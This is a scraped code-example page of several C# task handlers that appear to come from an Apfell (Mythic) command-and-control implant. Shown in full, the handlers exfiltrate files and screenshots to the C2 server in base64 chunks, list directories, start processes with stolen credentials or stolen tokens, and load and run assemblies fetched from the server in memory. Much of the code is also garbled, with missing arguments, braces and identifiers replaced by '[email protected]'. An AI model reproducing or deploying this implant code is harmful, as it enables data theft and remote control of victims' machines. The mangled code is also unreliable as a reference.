Beispiel #1
        // Same workflow as sending a file to Apfell server, but we only use one chunk
        private static void SendCapture(SCImplant implant, SCTask task, byte[] screenshot)
            try // Try block for HTTP request
                // Send total number of chunks to Apfell server
                // Number of chunks will always be one for screen capture task
                // Receive file ID in response
                SCTaskResp    initial = new SCTaskResp(, "{\"total_chunks\": " + 1 + ", \"task\":\"" + + "\"}");
                DownloadReply reply   = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
                Debug.WriteLine($"[-] SendCapture - Received reply, file ID: " + reply.file_id);

                // Convert chunk to base64 blob and create our FileChunk
                FileChunk fc = new FileChunk();
                fc.chunk_num  = 1;
                fc.file_id    = reply.file_id;
                fc.chunk_data = Convert.ToBase64String(screenshot);

                // Send our FileChunk to Apfell server
                // Receive status in response
                SCTaskResp response = new SCTaskResp(, JsonConvert.SerializeObject(fc));
                Debug.WriteLine($"[+] SendCapture - CHUNK SENT: {fc.chunk_num}");
                string postReply = implant.PostResponse(response);
                Debug.WriteLine($"[-] SendCapture - RESPONSE: {implant.PostResponse(response)}");

                // Tell the Apfell server file transfer is done
            catch (Exception e) // Catch exceptions from HTTP requests
                // Something failed, so we need to tell the server about it
                task.status  = "error";
                task.message = e.Message;
Beispiel #2
        public static void Execute(SCTask task, SCImplant implant)
            string path = task.@params;
            SharpSploitResultList <Host.FileSystemEntryResult> list;

                if (path != "")
                    list = Host.GetDirectoryListing(path);
                    list = Host.GetDirectoryListing();

                List <Dictionary <string, string> > fileList = new List <Dictionary <string, string> >();

                foreach (Host.FileSystemEntryResult item in list)
                    FileInfo f = new FileInfo(item.Name);
                    Dictionary <string, string> infoDict = new Dictionary <string, string>();
                        infoDict.Add("size", f.Length.ToString());
                        infoDict.Add("type", "file");
                        infoDict.Add("name", f.Name);
                        infoDict.Add("size", "0");
                        infoDict.Add("type", "dir");
                        infoDict.Add("name", item.Name);

                SCTaskResp response = new SCTaskResp(, JsonConvert.SerializeObject(fileList));
                task.status  = "complete";
                task.message = fileList.ToString();
            catch (DirectoryNotFoundException)
                Debug.WriteLine($"[!] DirectoryList - ERROR: Directory not found: {path}");
                implant.SendError(, "Error: Directory not found.");
                task.status  = "error";
                task.message = "Directory not found.";
            catch (Exception e)
                Debug.WriteLine($"DirectoryList - ERROR: {e.Message}");
                implant.SendError(, $"Error: {e.Message}");
                task.status  = "error";
                task.message = e.Message;
Beispiel #3
        /// <summary>
        /// Start a process using explicit credentials
        /// </summary>
        /// <param name="task"></param>
        /// <param name="implant"></param>
        /// <param name="Credentials"></param>
        public static void StartProcessWithCreds(SCTask task, SCImplant implant)
            string[]         split     = [email protected]().Split(' ');
            string           argString = string.Join(" ", split.Skip(1).ToArray());
            ProcessStartInfo startInfo = new ProcessStartInfo
                FileName               = split[0],
                Arguments              = argString,
                WorkingDirectory       = "C:\\Temp",
                UseShellExecute        = false,
                RedirectStandardOutput = true, // Ensure we get standard output
                CreateNoWindow         = true, // Don't create a new window
                Domain   = Token.Cred.Domain,
                UserName = Token.Cred.User,
                Password = Token.Cred.SecurePassword

            using (Process proc = new Process())
                proc.StartInfo = startInfo;

                    Debug.WriteLine("[-] DispatchTask -> StartProcessWithCreds - Tasked to start process " + startInfo.FileName);

                    List <string> procOutput = new List <string>();
                    SCTaskResp    response;

                    while (!proc.StandardOutput.EndOfStream)
                        string line = proc.StandardOutput.ReadLine();
                        if (procOutput.Count >= 5)
                            response = new SCTaskResp(, JsonConvert.SerializeObject(procOutput));

                    task.status  = "complete";
                    task.message = JsonConvert.SerializeObject(procOutput);
                catch (Exception e)
                    Debug.WriteLine("[!] DispatchTask -> StartProcess - ERROR starting process: " + e.Message);
                    task.status  = "error";
                    task.message = e.Message;
Beispiel #4
        public static void Execute(SCTask task, SCImplant implant)
            JObject json    = (JObject)JsonConvert.DeserializeObject(task.@params);
            string  file_id = json.Value <string>("file_id");

            string[]            args          = json.Value <string[]>("args");
            byte[]              assemblyBytes = Upload.GetFile(file_id, implant);
            Reflection.Assembly assembly      = Reflection.Assembly.Load(assemblyBytes);
            string              result        = assembly.EntryPoint.Invoke(null, args).ToString();

            implant.PostResponse(new SCTaskResp(, result));
Beispiel #5
        public static void Execute(SCTask task, SCImplant implant)
            string filepath = task.@params;

            try // Try block for file upload task
                // Get file info to determine file size
                FileInfo fileInfo = new FileInfo(filepath);
                long     size     = fileInfo.Length;
                Debug.WriteLine($"[+] Download - DOWNLOADING: {filepath}, {size} bytes");

                // Determine number of 512kb chunks to send
                long total_chunks = size / 512000;
                // HACK: Dumb workaround because longs don't have a ceiling operation
                if (total_chunks == 0)
                    total_chunks = 1;
                Debug.WriteLine($"[+] Download - File size = {size} ({total_chunks} chunks)");

                // Send number of chunks associated with task to Apfell server
                // Response will have the file ID to send file with
                SCTaskResp    initial = new SCTaskResp(, "{\"total_chunks\": " + total_chunks + ", \"task\": \"" + + "\"}");
                DownloadReply reply   = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
                Debug.WriteLine($"[-] Download - Received reply, file ID: " + reply.file_id);

                // Send file in chunks
                for (int i = 0; i < total_chunks; i++)
                    byte[] chunk = null;
                    long   pos   = i * 512000;

                    // We need to use a FileStream in case our file size in bytes is larger than an Int32
                    // With a filestream, we can specify a position as a long, and then use Read() normally
                    using (FileStream fs = new FileStream(filepath, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
                        fs.Position = pos;

                        // If this is the last chunk, size will be the remaining bytes
                        if (i == total_chunks - 1)
                            chunk = new byte[size - (i * 512000)];
                            int chunkSize = chunk.Length;
                            fs.Read(chunk, 0, chunkSize);
                        // Otherwise we'll read 512kb from the file
                            chunk = new byte[512000];
                            fs.Read(chunk, 0, 512000);

                    // Convert chunk to base64 blob and create our FileChunk
                    FileChunk fc = new FileChunk();
                    fc.chunk_num  = i;
                    fc.file_id    = reply.file_id;
                    fc.chunk_data = Convert.ToBase64String(chunk);

                    // Send our FileChunk to Apfell server
                    SCTaskResp response = new SCTaskResp(, JsonConvert.SerializeObject(fc));
                    Debug.WriteLine($"[+] Download - CHUNK SENT: {fc.chunk_num}");
                    Debug.WriteLine($"[-] Download - RESPONSE: {implant.PostResponse(response)}");
                    // Make sure we respect the sleep setting

                // Tell the Apfell server file transfer is done
                Debug.WriteLine($"[+] Download - File transfer complete: {filepath}");
            catch (Exception e) // Catch any exception from file upload
                // Something failed, so we need to tell the server about it
                task.status  = "error";
                task.message = e.Message;
Beispiel #6
        /// <summary>
        /// Start a process using a stolen token
        /// C#'s System.Diagnostics.Process doesn't respect a WindowsImpersonationContext so we have to use CreateProcessWithTokenW
        /// </summary>
        /// <param name="task"></param>
        /// <param name="implant"></param>
        /// <param name="TokenHandle"></param>
        public static void StartProcessWithToken(SCTask task, SCImplant implant)
            string[] split;
            string   argString;
            string   file;

            if (task.command == "shell")
                split     = [email protected]().Split(' ');
                argString = string.Join(" ", split);
                file      = "cmd /c";
                split     = [email protected]().Split(' ');
                argString = string.Join(" ", split.Skip(1).ToArray());
                file      = split[0];

            // STARTUPINFO is used to control a few startup options for our new process
            Win32.Advapi32.STARTUPINFO startupInfo = new Win32.Advapi32.STARTUPINFO();
            // Use C:\Temp as directory to ensure that we have rights to start our new process
            // TODO: determine if this is safe to change
            string directory = "C:\\Temp";

            // Set security on anonymous pipe to allow any user to access
            PipeSecurity sec = new PipeSecurity();

            sec.SetAccessRule(new PipeAccessRule("Everyone", PipeAccessRights.FullControl, AccessControlType.Allow));

            // TODO: Use anonymous pipes instead of named pipes
            using (AnonymousPipeServerStream pipeServer = new AnonymousPipeServerStream(PipeDirection.In, HandleInheritability.Inheritable, 1024, sec))
                using (AnonymousPipeClientStream pipeClient = new AnonymousPipeClientStream(PipeDirection.Out, pipeServer.GetClientHandleAsString()))
                        startupInfo.hStdOutput = pipeClient.SafePipeHandle.DangerousGetHandle();
                        startupInfo.hStdError  = pipeClient.SafePipeHandle.DangerousGetHandle();
                        // STARTF_USESTDHANDLES ensures that the process will respect hStdInput/hStdOutput
                        // STARTF_USESHOWWINDOW ensures that the process will respect wShowWindow
                        startupInfo.dwFlags     = (uint)Win32.Advapi32.STARTF.STARTF_USESTDHANDLES | (uint)Win32.Advapi32.STARTF.STARTF_USESHOWWINDOW;
                        startupInfo.wShowWindow = 0;

                        // Create PROCESS_INFORMATION struct to hold info about the process we're going to start
                        Win32.Advapi32.PROCESS_INFORMATION newProc = new Win32.Advapi32.PROCESS_INFORMATION();

                        // Finally, create our new process
                        bool createProcess = Win32.Advapi32.CreateProcessWithTokenW(
                            Token.stolenHandle,     // hToken
                            IntPtr.Zero,            // dwLogonFlags
                            null,                   // lpApplicationName
                            file + " " + argString, // lpCommandLineName
                            IntPtr.Zero,            // dwCreationFlags
                            IntPtr.Zero,            // lpEnvironment
                            directory,              // lpCurrentDirectory
                            ref startupInfo,        // lpStartupInfo
                            out newProc);           // lpProcessInformation

                        Thread.Sleep(100);          // Something weird is happening if the process exits before we can capture output

                        if (createProcess)          // Process started successfully
                            Debug.WriteLine("[+] DispatchTask -> StartProcessWithToken - Created process with PID " + newProc.dwProcessId);
                            SCTaskResp procStatus = new SCTaskResp(, "Created process with PID " + newProc.dwProcessId);
                            // Trying to continuously read output while the process is running.
                            using (StreamReader reader = new StreamReader(pipeServer))
                                SCTaskResp    response;
                                string        message = null;
                                List <string> output  = new List <string>();

                                    Process proc = Process.GetProcessById(newProc.dwProcessId); // We can use Process.HasExited() with this object

                                    while (!proc.HasExited)
                                        // Will sometimes hang on ReadLine() for some reason, not sure why
                                        // Workaround for this is to time out if we don't get a result in ten seconds
                                        Action action = () =>
                                                message = reader.ReadLine();
                                                // Fail silently if reader no longer exists
                                                // May happen if long running job times out?
                                        IAsyncResult result = action.BeginInvoke(null, null);
                                        if (result.AsyncWaitHandle.WaitOne(300000))
                                            if (message != "" && message != null)
                                                if (output.Count >= 5) // Wait until we have five lines to send
                                                    response = new SCTaskResp(, JsonConvert.SerializeObject(output));
                                            throw new Exception("Timed out while reading named pipe.");
                                catch (Exception e)
                                    // Sometimes process may exit before we get this object back
                                    if (e.Message == "Timed out while reading named pipe.") // We don't care about other exceptions
                                        throw e;

                                Debug.WriteLine("[+] DispatchTask -> StartProcessWithToken - Process with PID " + newProc.dwProcessId + " has exited");


                                while (reader.Peek() > 0)         // Check if there is still  data in the pipe
                                    message = reader.ReadToEnd(); // Ensure we get any output that we missed when loop ended
                                    foreach (string msg in message.Split(new[] { Environment.NewLine }, StringSplitOptions.None))
                                if (output.Count > 0)
                                    task.status = "complete";
                                    output.Add("Execution complete.");
                                    task.message = JsonConvert.SerializeObject(output);
                                    task.status  = "complete";
                                    task.message = "Execution complete.";

                            string errorMessage = Marshal.GetLastWin32Error().ToString();
                            Debug.WriteLine("[!] DispatchTask -> StartProcessWithToken - ERROR starting process: " + errorMessage);
                            task.status  = "error";
                            task.message = errorMessage;
                    catch (Exception e)
                        task.status  = "error";
                        task.message = e.Message;